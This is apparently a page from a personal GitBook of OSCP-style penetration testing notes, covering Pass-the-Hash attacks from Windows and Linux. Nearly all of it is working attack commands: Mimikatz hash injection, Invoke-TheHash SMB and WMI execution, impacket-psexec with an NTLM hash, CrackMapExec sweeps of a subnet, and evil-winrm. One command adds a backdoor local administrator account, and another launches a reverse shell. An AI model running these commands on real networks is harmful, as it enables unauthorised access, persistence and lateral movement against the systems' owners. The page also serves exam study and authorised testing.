📚
Notes
  • Welcome
    • Intro
    • My OSCP Exam Adventure
  • Security Blogs
    • Initial Access 101
      • Spring Cloud Function CVE-2022-22963
    • Bug Hunting
      • XSS
        • Blog site search field
  • Active Directory
    • Tools
    • Common built-in AD groups
    • Identifying Users
    • LLMNR/NBT-NS Poisoning
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Making a Target User list
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
    • Credentialed Enumeration
      • Linux
      • Windows
      • Living Off the Land
    • Kerberoasting
      • Linux
      • Windows
    • ACL
      • Enumeration
      • Abusing ACLs
      • DCSync
    • Privileged Access
    • AS-REP Roasting
    • Attacking Trusts
      • Enumerating Trust Relationships
      • Child -> Parent Trusts
      • Cross-Forest Trust Abuse
  • Enumeration
    • SMB, RPC - 137,138,139,445,111
    • MYSQL - 3306
    • MSSQl - 1433
    • FTP - 21
    • RPC - 111
    • DNS - 53
    • NFS - 2049
    • SMTP - 25
    • IMAP, POP3 - 110,143,993,995
    • SNMP - 161
    • SVN - 3690
    • IRC - 8067
    • Oracle TNS - 1521
    • LDAP
    • Linux Remote Management Protocols
    • Windows Remote Management Protocols
    • Fuzzing
    • IPMI - 623(UDP)
  • Common Applications
    • Application Enumeration
    • CMS (Content Management System)
      • Wordpress
      • Joomla
      • Drupal
    • Servlet Containers/Software Development
      • Tomcat
      • Jenkins
    • Customer Service Mgmt & Configuration Management
      • Gitlab
  • Shells
    • Reverse Shells
    • Bind Shells
    • Spawning a TTY Shell
    • Web Shells
  • Privilege Escalation
    • Other Resources
    • Linux PrivEsc
    • Windows PrivEsc
      • Windows Users Privileges
      • Information Gatthering & Enumeration
      • Privilege Escalation Techniques
  • File Transfers
    • Quick Cheatsheet
    • Windows File Transfer
    • Linux File Transfer
  • Password Attacks
    • Linux Local Password Attacks
      • Credential Hunting in Linux
      • Passwd, Shadow & Opasswd
    • Windows Local Password Attacks
      • Attacking SAM
      • Attacking LSASS
      • Attacking Active Directory & NTDS.dit
      • Credential Hunting in Windows
    • Pass-the-Hash (PtH)
    • Cracking Files
    • Remote Password Attacks
  • SIde Notes
    • Pivoting, Tunneling, and Port Forwarding
    • File Encryption
  • Programming
    • Downloading Files
Powered by GitBook
On this page
  • From Windows
  • Mimikatz
  • PowerShell Invoke-TheHash
  • From Linux
  • Impacket-Psexec
  • CrackMapExec
  • evil-winrm
  1. Password Attacks

Pass-the-Hash (PtH)

From Windows

Mimikatz

mimikatz.exe privilege::debug "sekurlsa::pth /user:eren /rc4:paste-hash-here /domain:domain.local /run:cmd.exe" exit

PowerShell Invoke-TheHash

  • https://github.com/Kevin-Robertson/Invoke-TheHash

# Importing the module
Import-Module .\\Invoke-TheHash.psd1

# Invoke-TheHash with SMB
# below command will add local administrator to target system
Invoke-SMBExec -Target ip -Domain domain.com -Username eren -Hash paste-hash -Command "net user eren Password123 /add && net localgroup administrators eren /add" -Verbose

# Invoke-TheHash with WMI 
# below command will run a reverse shell 
Invoke-WMIExec -Target DC01 -Domain Administrator -Username eren -Hash paste-hash -Command "powershell -e reverse can be copied from revshells.com"

From Linux

Impacket-Psexec

impacket-psexec administrator@ip -hashes :30B3783CE2ABF1AF70F77D0660CF3453

CrackMapExec

crackmapexec smb 10.10.1.0/24 -u Administrator -d . -H hash

crackmapexec smb ip -u Administrator -d . -H hash -x whoami

evil-winrm

evil-winrm -i ip -u Administrator -H hash
PreviousCredential Hunting in WindowsNextCracking Files

Last updated 2 years ago